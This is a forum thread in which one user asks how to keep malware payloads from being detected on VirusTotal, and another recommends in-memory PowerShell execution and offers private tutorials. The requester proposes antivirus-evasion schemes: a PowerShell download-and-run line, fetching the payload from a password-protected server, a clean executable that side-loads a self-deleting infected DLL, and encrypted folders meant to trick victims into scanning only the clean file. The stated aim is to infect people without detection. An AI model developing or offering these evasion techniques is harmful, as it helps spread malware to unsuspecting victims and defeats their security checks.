
How to bypass VirusTotal scan


cacaocaca

Hi, I'm the person who texted you on your YouTube channel. I would like to know how to bypass the scan on VirusTotal, because when I make a payload, after 5 days it is detectable again, so I can make a payload forever after 5 days... So how can I bypass it? Can I create a payload where, when I try to scan it on VirusTotal, the file is impossible to upload? Or, to bypass VirusTotal, can I maybe use PowerShell that downloads another file while it runs? This is just one example:
PowerShell (New-Object System.Net.WebClient).DownloadFile(' 'a.exe'
Or another good idea: when people execute the file, to really open the file it needs some Visual Basic script that opens a window asking for a password to connect to your server and download your malicious file, but the password is stored on your server, not in your exe ;) Or when people execute the original exe without a virus, it automatically executes another DLL that is present in the same folder, and after some time this DLL deletes itself automatically, so VirusTotal doesn't have time to analyze the DLL because it is already deleted. I don't know much about programming, but for many days I have been thinking about it at night and I came up with this idea. Tell me if you know another good idea where I can make one payload and be sure that after some days the .exe file is not detected again...
 

<~DarkNode~>

Hello bro) Thanks for your attention)
VirusTotal is a global problem... Many children (anonymous groups :D and others) test many good tools and projects on VirusTotal.
IMHO the best way is PowerShell invoke methods and running PE binaries in memory) If I find the time I will write about this a little later, but I write all my methods in Russian) Sorry bro, but I can't write in English only for you :(
In English I can only record demo videos)
 

cacaocaca

Bro, yes, you can write in Russian, but the script is a universal language. I just need something that works, and if you make a tutorial that I can look at, that is good. But please do not share this video on YouTube, because it is the same as if you shared it on VirusTotal, hahah, and do not share it here on the public forum; sharing it just in private is better ;)
 

cacaocaca

This idea is temporary. I was thinking, since this program's folder "has so many DLL files", how again to get around people scanning the file that is really infected? Can't I bypass it and make the file not uploadable? So what can I do? Maybe I can use another way... I can use some encryption, AES or other, that the AV companies can't decrypt, and that can encrypt the full folder, and when extracted the output is one folder containing all the files inside and not a .zip file... The small difference is that it just needs to have some instruction in file.exe ("clean, without backdoor") that says that when the file containing the software clean.exe is run, it also executes the infected DLL present in the same directory? But what is the difference? The difference is that this has many DLL files and other files inside, so people, after I have sent the password for decryption and they want to scan the file, just scan the .exe file ("the clean file") and do not think to scan all the DLL files or the others, so when scanned on VirusTotal it looks clean, and the AV companies see the instruction that says to run another DLL, but they do not see which DLL because it has not been uploaded. Tell me if this could be good and easier to do ;)
 